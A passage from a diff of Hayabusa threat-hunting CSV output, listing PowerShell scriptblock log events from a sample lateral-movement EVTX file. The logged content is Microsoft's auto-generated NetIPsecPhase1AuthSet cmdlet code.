$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecPhase1AuthSet' -Alias '*' function Rename-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')]",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.514 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"[Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecPhase1AuthSet' -Alias '*' function Copy-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcess",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.514 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"[Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains 